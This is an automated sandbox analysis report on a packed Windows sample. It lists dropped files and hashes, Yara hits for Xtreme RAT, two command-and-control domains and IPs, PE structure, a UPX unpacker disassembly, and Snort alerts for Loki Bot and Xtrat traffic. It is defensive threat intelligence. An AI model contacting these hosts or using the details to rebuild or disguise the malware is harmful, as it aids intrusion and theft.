SHA-512:	D91EEBC8F30EDCE1A7E16085EB1B18CFDDF0566EFAB174BBCA53DE453EE36DFECB747D401E787A4D15CC9798E090E19A8A0CF3FC8246116CE507D6B464068CDB
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\management\management.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	14097
Entropy (8bit):	4.571122906644089
Encrypted:	false
MD5:	81A43119AB15099C1D70E2D683FC8C0A
SHA1:	5496AA366AEC8168218963F8F85FC9D3F8691DD5
SHA-256:	FCACFA57CE3FE6372C2273ABC032A1320BE021AF42553E2104DB9937B6771783
SHA-512:	1526F581582DED7982C3BF1D0F0D8A3AFC0FF5B0A48B921DD0ACD29BD68B587546618E261B971FAE48C72BE410D106E7DD915723EDC4FFE9498FB0B45DC84AD0
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\management\snmp.acl.template
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	3376
Entropy (8bit):	4.371600962667749
Encrypted:	false
MD5:	71A7DE7DBE2977F6ECE75C904D430B62
SHA1:	2E9F9AC287274532EB1F0D1AFCEFD7F3E97CC794
SHA-256:	F1DC97DA5A5D220ED5D5B71110CE8200B16CAC50622B33790BB03E329C751CED
SHA-512:	3A46E2A4E8A78B190260AFE4EEB54E7D631DB50E6776F625861759C0E0BC9F113E8CD8D734A52327C28608715F6EB999A3684ABD83EE2970274CE04E56CA1527
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\meta-index
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	2126
Entropy (8bit):	4.970874214349508
Encrypted:	false
MD5:	91AA6EA7320140F30379F758D626E59D
SHA1:	3BE2FEBE28723B1033CCDAA110EAF59BBD6D1F96
SHA-256:	4AF21954CDF398D1EAE795B6886CA2581DAC9F2F1D41C98C6ED9B5DBC3E3C1D4
SHA-512:	03428803F1D644D89EB4C0DCBDEA93ACAAC366D35FC1356CCABF83473F4FEF7924EDB771E44C721103CEC22D94A179F092D1BFD1C0A62130F076EB82A826D7CB
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\net.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	3070
Entropy (8bit):	4.811099943962601
Encrypted:	false
MD5:	19A5C7F5186854362281A152E756CE2F
SHA1:	CC738221F126334DE60D73B5DB63789C41E282AC
SHA-256:	5D62F39E6EB46C7A731B6997A14ACFEB63F5C95DFCEF8DE3D4D94B5D571372C6
SHA-512:	24E3489B825015226C7C2A1AC6CC2D20D5056C8D578D612F73A35AA43A953CFE331FD6CBDC251CE23CFAA403130848822DD3EFB30ED427F25A1221BA0A2B2BF3
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\plugin.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Java Jar file data (zip)
Size (bytes):	1917859
Entropy (8bit):	6.075665954318062
Encrypted:	false
MD5:	B54491C083786CF2972723668775ABBD
SHA1:	0EB425BFCF7763E4D7A9C932479B69B3482476E2
SHA-256:	61E8DDBD2F1378472FE52C51C1A9FAA4714C6494C2C00F5FEE09E712E6393B40
SHA-512:	8D7493714D2025A40307A043A09693333F510811DA004B466C17853D69D759965B34108467D81BD4835C3B22F75AADC09EB9C7AC70BE85BE05A40A45353087B5
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\psfont.properties.ja
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	2796
Entropy (8bit):	5.182793663606789
Encrypted:	false
MD5:	7C5514B805B4A954BC55D67B44330C69
SHA1:	56ED1C661EEEDE17B4FAE8C9DE7B5EDBAD387ABC
SHA-256:	0C790DE696536165913685785EA8CBE1AC64ACF09E2C8D92D802083A6DA09393
SHA-512:	CCD4CB61C95DEFDCBA6A6A3F898C29A64CD5831A8AB50E0AFAC32ADB6A9E0C4A4BA37EB6DEE147830DA33AE0B2067473132C0B91A21D546A6528F42267A2C40E
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\psfontj2d.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	10393
Entropy (8bit):	4.970762688893053
Encrypted:	false
MD5:	F8734590A1AEC97F6B22F08D1AD1B4BB
SHA1:	AA327A22A49967F4D74AFEEE6726F505F209692F
SHA-256:	7D51936FA3FD5812AE51F9F5657E0E70487DCA810B985607B6C5D6603F5E6C98
SHA-512:	72E62DC63DAA2591B48B2B774E2479B8861D159061B92FD3A0A06256295DA4D8B20DAFA77983FDBF6179F666F9FF6B3275F7A5BCF9555E638595230B9A42B177
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\resources.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Java Jar file data (zip)
Size (bytes):	3487757
Entropy (8bit):	6.066156924449017
Encrypted:	false
MD5:	5779CA817DB790AE16FCF0AB9EDF43ED
SHA1:	87FF661CA136E4604D54A7F30F624516786DAF72
SHA-256:	1707746EBB1AFF43523E85801FF4446CDC1674120F7EBE8777242A3A72B33699
SHA-512:	1C15E985D04C2D047665D97A79D9D003B6A3AA69BAD58B8368D183B0995D4A22A7B52CDFF086EF1225C3A6B8C2A54358AB4481B6154CC4466670E76A97BBA82B
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\rt.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Java Jar file data (zip)
Size (bytes):	54326594
Entropy (8bit):	6.04393675326926
Encrypted:	false
MD5:	F549CEAD08CE871DA14A46EEE67151DA
SHA1:	BDD90BE6CDFED2FA0622AE1571A4855ADC4C3362
SHA-256:	A1C28605D405FF4594DFEC0F8D0FEAFECEF02E16C252A282EB834D161AD11118
SHA-512:	F6A21D1A14BA76DBF12F03F0AFAAEBE51FE2ED9072E227C9F36A56BB300A7243E8D4D45F45D5E7DB8D93CECD2A8CF6949F778CE87F26ED74019D542FD9175D40
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\security\US_export_policy.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Zip archive data, at least v2.0 to extract
Size (bytes):	3026
Entropy (8bit):	7.489021280283832
Encrypted:	false
MD5:	EE4ED9C75A1AAA04DFD192382C57900C
SHA1:	7D69EA3B385BC067738520F1B5C549E1084BE285
SHA-256:	90012F900CF749A0E52A0775966EF575D390AD46388C49D512838983A554A870
SHA-512:	EAE6A23D2FD7002A55465844E662D7A5E3ED5A6A8BAF7317897E59A92A4B806DD26F2A19B7C05984745050B4FE3FFA30646A19C0F08451440E415F958204137C
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\security\blacklist
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	3890
Entropy (8bit):	5.792728971848364
Encrypted:	false
MD5:	2D60AEECC745F096E96E93C5E04B68C3
SHA1:	E0992C1DA2395676E4982EEF2810475D359E3C94
SHA-256:	964BD816655288112E4153015C59918C4356453C08AE8486625A3D01B61EB5BA
SHA-512:	98298429EFB4A93C95ABC4DE608E1B0F6B962D6FDB36AF6F237C64971A3794E426452C9900304717881E908C087538A09F0B12516413C21E705DF8686CA40AFB
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\security\blacklisted.certs
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	1188
Entropy (8bit):	4.117327178183988
Encrypted:	false
MD5:	91C7195D1ABF0081758CE00C8248732C
SHA1:	9F8852FFCBA434070E23DC2E1F22B3B284BA8854
SHA-256:	A8E6DAF874FA9854C80EB6ABA7B4D327B641F74D95033ADC2A80C6D6D0BA26E2
SHA-512:	C1D464158AA86C622BECB197C0F95C9D2B24D5E9CD38707AE47E6D7B2F614CB1F99F146C9288E1E93C6B103B0E78471544CA1B08BB08D24BFDE758E894626377
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\security\cacerts
Process:	C:\Windows\System32\xcopy.exe
File Type:	Java KeyStore
Size (bytes):	94618
Entropy (8bit):	7.539717343373983
Encrypted:	false
MD5:	9309C959C1E58990B8B7DF6B4D53480A
SHA1:	BF49219425E56B7B78FFF55C60B84DB085FCC036
SHA-256:	DE56FBDAFBEBDC669B87B5B629025F247AE499226734300EB8C902A2DBEA5D75
SHA-512:	076331311619093BE082EC084DFCDF3BFCAE3438F78591A14951643CEC2E22E15BEB6ED6FCDC8F2EE38907C6B79966260E6930BF4A94D701079C8F2F144F6D61
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\security\java.policy
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	2466
Entropy (8bit):	4.437992103838927
Encrypted:	false
MD5:	11340CD598A8517A0FD315A319716A08
SHA1:	C0112209A567B3B523CFED7041709F9440227968
SHA-256:	B8582889B0DF36065093C642ED0F9FA2A94CC0DC6FDE366980CFD818EC957250
SHA-512:	2B6DADC555EEB28DC1C553AB429F0CB9E3AD9AA64DFA2B62910769A935A1E6030A7FF0DDE2689F29C58D1B0720416D6B99FFA19BD23E6686EFB1547AFB7DCCFD
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\security\java.security
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	21854
Entropy (8bit):	4.728185169557546
Encrypted:	false
MD5:	3FA83777D956A15D705B74A195EF59F6
SHA1:	7F085E6436B281AB5E8D0A0A97263DEDD09D6D1F
SHA-256:	FE9C2F711FDE60E13FC9B5A67758499E927B793BE2C496845EE39698FDB18EA1
SHA-512:	D6744069F5A6EF2A78E6D567C4BB8E9FDB9EB0614E809F20EE67F9C336D0853C53023604A8A60BA64E25E5EE8FEE049340536718B8345326CA1997E3F8F27922
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\security\javaws.policy
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	98
Entropy (8bit):	4.75309355004813
Encrypted:	false
MD5:	9107D028BD329DBFE4C1F19015ED6D80
SHA1:	4384CA5E4D32F7DD86D8BADDD1E690730D74E694
SHA-256:	B7A87D1F3F4B7BA1D19D0460FA4B63BD1093AFC514D67FE3C356247236326425
SHA-512:	81B14373B64CE14AF26B70D12D831E05158D5A4FA8CEC0508FEF8A6CA65B6F4EF73928F4B1E617C68DDEACFF9328A3D4433B041B7FB14DE248B1428C51DBC716
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\security\local_policy.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Zip archive data, at least v2.0 to extract
Size (bytes):	3527
Entropy (8bit):	7.521709350514315
Encrypted:	false
MD5:	57AAAA3176DC28FC554EF0906D01041A
SHA1:	238B8826E110F58ACB2E1959773B0A577CD4D569
SHA-256:	B8BECC3EF2E7FF7D2165DD1A4E13B9C59FD626F20A26AF9A32277C1F4B5D5BC7
SHA-512:	8704B5E3665F28D1A0BC2A063F4BC07BA3C7CD8611E06C0D636A91D5EA55F63E85C6D2AD49E5D8ECE267D43CA3800B3CD09CF369841C94D30692EB715BB0098E
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\sound.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	1210
Entropy (8bit):	4.681309933800066
Encrypted:	false
MD5:	4F95242740BFB7B133B879597947A41E
SHA1:	9AFCEB218059D981D0FA9F07AAD3C5097CF41B0C
SHA-256:	299C2360B6155EB28990EC49CD21753F97E43442FE8FAB03E04F3E213DF43A66
SHA-512:	99FDD75B8CE71622F85F957AE52B85E6646763F7864B670E993DF0C2C77363EF9CFCE2727BADEE03503CDA41ABE6EB8A278142766BF66F00B4EB39D0D4FC4A87
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\tzdb.dat
Process:	C:\Windows\System32\xcopy.exe
File Type:	data
Size (bytes):	102449
Entropy (8bit):	7.10392354325991
Encrypted:	false
MD5:	F41F90354EBF3FECB33068758FA8FE7C
SHA1:	673DB134570A2698631DBCC5C5054D4465B7A6EA
SHA-256:	81C299207A46CC8BCE2E11DD5195E2F4D0D355EDFE7F3C5D6B88B1EB431A7616
SHA-512:	8B66550D3D33B166DAFB541E071B7FC50933BA49E413C7407672C94E437C952E18DA88CAC7D7DB8C784F1C36DE90B86584CB85B89F3151203F0E8D2C9F11A504
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\tzmappings
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	8400
Entropy (8bit):	5.164879464727495
Encrypted:	false
MD5:	7D4ABBCFB06D083F349E27D7E6972F3C
SHA1:	EB91253590526F7BE7415839CCBF702683639C8C
SHA-256:	D936EE24810B747C54192B4B5A279F21179FE3CEB42D113D025A368EBB7CB5A7
SHA-512:	E5C2FBBC07CD53BAF14F3CC239B56B42B73DE47F9B7904AABF7D97695D2AB8866D0C8179235CBF022245949B9B8E419985E328AA5ED333B14B8B4DE2C82B225E
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\release
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text, with very long lines
Size (bytes):	526
Entropy (8bit):	5.3929171245299985
Encrypted:	false
MD5:	D5ADDA5A74BDCAA429B6266DAA7E9975
SHA1:	9304825D37F13F885FB853C5B9B1243EC20BE518
SHA-256:	C0FD50797E8A1A72F1B80CDB8FF1F46291301DCD31D00F3833189C690B69B91C
SHA-512:	AA994E886BF150FD2631727E2892D0EE7C7C3E310FE03DA6FEA87385E2C1F3069DD080319CC9352FAA3025CA13EB5E7EEF237D2A5D1BBEAB5C25AA4D2C5B2574
Malicious:	false

C:\Users\user\JbWWIoBadTZ\ID.txt
Process:	C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe
File Type:	ASCII text, with no line terminators
Size (bytes):	47
Entropy (8bit):	4.28279230889429
Encrypted:	false
MD5:	311A62F92984CF6BB94B2FEAF0BBB4E9
SHA1:	82FE327B17C4AFBF789B7553DF2B6A7AD6AB248F
SHA-256:	03E8C4C195853F059B9E2101DAA29C210804ED47FFD361259A3ECEE0FE3744DE
SHA-512:	9F9CBF7A0FAAE223E7EB116998335F7CDD14F54101972F189792D5DBFFE49F3C6D1995A8444EAA9388B732E3F1DE4361A6A7DCE02F98CB1B44B2A59FAFF3D7E6
Malicious:	false

C:\Users\user\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik
Process:	C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe
File Type:	Java Jar file data (zip)
Size (bytes):	490811
Entropy (8bit):	7.993050223293411
Encrypted:	true
MD5:	97A01EE483BF0ECEFC0DBE43C626657B
SHA1:	57E5DBE078816B8E82931391300B3AFDF334E3EC
SHA-256:	693115A7758BAD8850BA23A9AC50F9295BD252ED496FB601462C5FD124E66B03
SHA-512:	A542699316E8324C53385BD5B71F7D9EC001D6ACFC0454245BA1EB1A6409BC09B7F94C0868DE0B495011BC2B595EDB7D67B6619795718A1500A172E93AA73A5B
Malicious:	false

C:\Windows\InstallDir\Server.exe
Process:	C:\Users\user\AppData\Local\Temp\server.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	546304
Entropy (8bit):	7.954817868127675
Encrypted:	false
MD5:	1BD2D8CA67E8FF5FDCCCFEBE2F8ECD35
SHA1:	4BEAF9F98BF3133AAA93FE0935ACC6BBD451BE01
SHA-256:	371797338D6F12D89D9D697B1FCFD35E4DF3410A48812CE3C10C6980553FAEC8
SHA-512:	F0B33DD4EBC81EA946458224DA80884C1766E85F28706032B96E5C4FEECB8FE72BE462B9BA1FD31E1704E0758A135464693023444B3AE57FFB78734DDC3A3832
Malicious:	true
Yara Hits:	Rule: Xtreme_Sep17_1, Description: Detects XTREME sample analyzed in September 2017, Source: C:\Windows\InstallDir\Server.exe, Author: Florian Roth Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: C:\Windows\InstallDir\Server.exe, Author: Kevin Breen <kevin@techanarchy.net>

C:\Windows\System32\test.txt
Process:	C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe
File Type:	ASCII text, with very long lines, with no line terminators
Size (bytes):	956
Entropy (8bit):	5.609530454672842
Encrypted:	false
MD5:	209FF18D911CBDA50BAE63478D4A84F1
SHA1:	474954BE0A08F4E99AA66D4B4424F91C814078C5
SHA-256:	643AC2D53D1C9ECA18DC27B6C1FC74325F161625285EB618D3EE7D8B22E72D08
SHA-512:	50B0492BD725263C9AC1F22CCDE76E94132F86FB1983A46B2C9A1EB992C21CF4831A42F2E2C22392D5482950F80E32526588FE62AEB5A5EF1157A8A17DC750EF
Malicious:	false

\samr
Process:	C:\Users\user\AppData\Local\Temp\358saxio.exe
File Type:	Hitachi SH big-endian COFF object, not stripped
Size (bytes):	116
Entropy (8bit):	4.053374040827533
Encrypted:	false
MD5:	080E701E8B8E2E9C68203C150AC7C6B7
SHA1:	4EF041621388B805758AE1D3B122F9D364705223
SHA-256:	FE129AE2A7C96708754F6F51091E6E512C9FEACA1042A1E9DB914C651FEB344D
SHA-512:	C11D88B8E355B7B922B985802464B693F75BA4C2A62F9137A15842CA82F9B6B3ED13059EDC0DF1C04E7DE43719D892B4C0D22BB67BE0D57EAB368BA1BC057E79
Malicious:	false

unknown
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	10941
Entropy (8bit):	4.990916598990784
Encrypted:	false
MD5:	089F742EFA245971FC5134F58D51D46B
SHA1:	26C6FA9F02744AB05F9C42143F4E6E5AB538B95E
SHA-256:	19E29E8473A89A80163AD4724EC04EF7C2C3D7A858229CADEA35454523395130
SHA-512:	B5750812EC0BDA97D7672D099D72E7354DA21C83334392B021E31308A6C3A57F445A935F61A1994E92683ED103E9550515FB47EA328E728AAE23E9E549DA201E
Malicious:	false

Contacted Domains/Contacted IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
iaficasioo.zapto.org	185.208.211.131	true	true	1%, virustotal, Browse	unknown
fashionstune.com	103.48.119.225	true	true	3%, virustotal, Browse	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	Flag	ASN	ASN Name	Malicious
103.48.119.225	Bangladesh		38744	AONB-AS-APAlwaysOnNetworkBangladeshLtdBD	true

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):	7.698097407285296
TrID:	Win32 Executable (generic) a (10002005/4) 99.37% UPX compressed Win32 Executable (30571/9) 0.30% Win32 EXE Yoda's Crypter (26571/9) 0.26% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	sxz.exe
File size:	2297344
MD5:	d87bda9120de373ab47fe445b99b6298
SHA1:	0bb96c96b0d5ecec102a61ade898065b39f89e1a
SHA256:	6cd8339bef4fddc4797b25af902caa74907fc95b97c1e07ab024fd9f70d07894
SHA512:	314f2985929855f290ab40442570c9474f3dc9370f579ed7132a21bb41995806d99ac4ea45021058a413e784b0f88200663a35544e7a6c75a1bf2b7119a7315c
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon

Static PE Info

General
Entrypoint:	0x874690
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	bcbcdd6593a8f67c903cb8d18e976ee0

Entrypoint Preview

Instruction
pushad
mov esi, 00645000h
lea edi, dword ptr [esi-00244000h]
push edi
or ebp, FFFFFFFFh
jmp 00007F4499A53CF2h
nop
nop
nop
nop
nop
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F4499A53CE9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F4499A53CCFh
mov eax, 00000001h
add ebx, ebx
jne 00007F4499A53CE9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F4499A53CEDh
jne 00007F4499A53D0Ah
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F4499A53D01h
dec eax
add ebx, ebx
jne 00007F4499A53CE9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F4499A53CB6h
add ebx, ebx
jne 00007F4499A53CE9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007F4499A53D34h
xor ecx, ecx
sub eax, 03h
jc 00007F4499A53CF3h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F4499A53D57h
sar eax, 1
mov ebp, eax
jmp 00007F4499A53CEDh
add ebx, ebx
jne 00007F4499A53CE9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F4499A53CAEh
inc ecx
add ebx, ebx
jne 00007F4499A53CE9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F4499A53CA0h
add ebx, ebx
jne 00007F4499A53CE9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F4499A53CD1h
jne 00007F4499A53CEBh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F4499A53CC6h
add ecx, 02h
cmp ebp, FFFFFB00h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x475c28	0x2ac	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x475000	0xc28	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x474840	0x18	UPX1
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0x244000	0x0	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX1	0x245000	0x230000	0x22fa00	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x475000	0x1000	0x1000	False	0.328125	data	3.51061779407	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x9a7a4	0x134	empty	English	United States
RT_CURSOR	0x9a8d8	0x134	empty	English	United States
RT_CURSOR	0x9aa0c	0x134	empty	English	United States
RT_CURSOR	0x9ab40	0x134	empty	English	United States
RT_CURSOR	0x9ac74	0x134	empty	English	United States
RT_CURSOR	0x9ada8	0x134	empty	English	United States
RT_CURSOR	0x9aedc	0x134	empty	English	United States
RT_ICON	0x4757a8	0x468	GLS_BINARY_LSB_FIRST	Russian	Russia
RT_STRING	0x9b478	0x40	empty
RT_STRING	0x9b4b8	0x34c	empty
RT_STRING	0x9b804	0xfc	empty
RT_STRING	0x9b900	0xcc	empty
RT_STRING	0x9b9cc	0x110	empty
RT_STRING	0x9badc	0x40c	empty
RT_STRING	0x9bee8	0x394	empty
RT_STRING	0x9c27c	0x384	empty
RT_STRING	0x9c600	0x3a0	empty
RT_STRING	0x9c9a0	0x214	empty
RT_STRING	0x9cbb4	0xcc	empty
RT_STRING	0x9cc80	0x194	empty
RT_STRING	0x9ce14	0x3c4	empty
RT_STRING	0x9d1d8	0x338	empty
RT_STRING	0x9d510	0x294	empty
RT_RCDATA	0x9d7a4	0x3be993	empty
RT_RCDATA	0x45c138	0x8f94	data
RT_RCDATA	0x4650cc	0xaee7	data
RT_RCDATA	0x46ffb4	0x1333	data
RT_GROUP_CURSOR	0x4712e8	0x14	data	English	United States
RT_GROUP_CURSOR	0x4712fc	0x14	data	English	United States
RT_GROUP_CURSOR	0x471310	0x14	data	English	United States
RT_GROUP_CURSOR	0x471324	0x14	data	English	United States
RT_GROUP_CURSOR	0x471338	0x14	Dyalog APL version 251 .127	English	United States
RT_GROUP_CURSOR	0x47134c	0x14	DOS executable (COM)	English	United States
RT_GROUP_CURSOR	0x471360	0x14	data	English	United States
RT_GROUP_ICON	0x475c14	0x14	MS Windows icon resource - 1 icon	Russian	Russia

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, GetProcAddress, VirtualProtect, ExitProcess
advapi32.dll	RegFlushKey
comctl32.dll	ImageList_Add
comdlg32.dll	GetSaveFileNameA
gdi32.dll	SaveDC
msimg32.dll	GradientFill
oleaut32.dll	VariantCopy
shell32.dll	SHGetSpecialFolderPathA
user32.dll	GetDC
version.dll	VerQueryValueA
wsock32.dll	WSACleanup

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Russian	Russia

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/03/18-10:12:05.729263	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49188	80	192.168.1.16	103.48.119.225
05/03/18-10:12:07.377967	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49189	80	192.168.1.16	103.48.119.225
05/03/18-10:12:08.024534	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49190	80	192.168.1.16	103.48.119.225
05/03/18-10:12:08.991967	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49191	80	192.168.1.16	103.48.119.225
05/03/18-10:12:10.756988	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49192	80	192.168.1.16	103.48.119.225
05/03/18-10:12:11.876215	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49193	80	192.168.1.16	103.48.119.225
05/03/18-10:12:12.597478	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49194	80	192.168.1.16	103.48.119.225
05/03/18-10:12:34.756768	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49196	80	192.168.1.16	103.48.119.225
05/03/18-10:12:57.480430	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49199	80	192.168.1.16	103.48.119.225
05/03/18-10:13:03.997433	TCP	2016275	ET TROJAN Win32/Xtrat.A Checkin	49205	2379	192.168.1.16	185.208.211.131
05/03/18-10:13:09.074934	TCP	2016275	ET TROJAN Win32/Xtrat.A Checkin	49211	2379	192.168.1.16	185.208.211.131
05/03/18-10:13:14.137505	TCP	2016275	ET TROJAN Win32/Xtrat.A Checkin	49216	2379	192.168.1.16	185.208.211.131
05/03/18-10:13:19.394261	TCP	2016275	ET TROJAN Win32/Xtrat.A Checkin	49220	2379	192.168.1.16	185.208.211.131
05/03/18-10:13:19.489873	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49221	80	192.168.1.16	103.48.119.225
05/03/18-10:13:20.192783	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49224	80	192.168.1.16	103.48.119.225
05/03/18-10:13:20.853153	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49225	80	192.168.1.16	103.48.119.225
05/03/18-10:13:21.494038	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49226	80	192.168.1.16	103.48.119.225
05/03/18-10:13:22.126504	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49228	80	192.168.1.16	103.48.119.225
05/03/18-10:13:22.901794	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49230	80	192.168.1.16	103.48.119.225
05/03/18-10:13:23.605836	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49231	80	192.168.1.16	103.48.119.225
05/03/18-10:13:24.252296	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49233	80	192.168.1.16	103.48.119.225
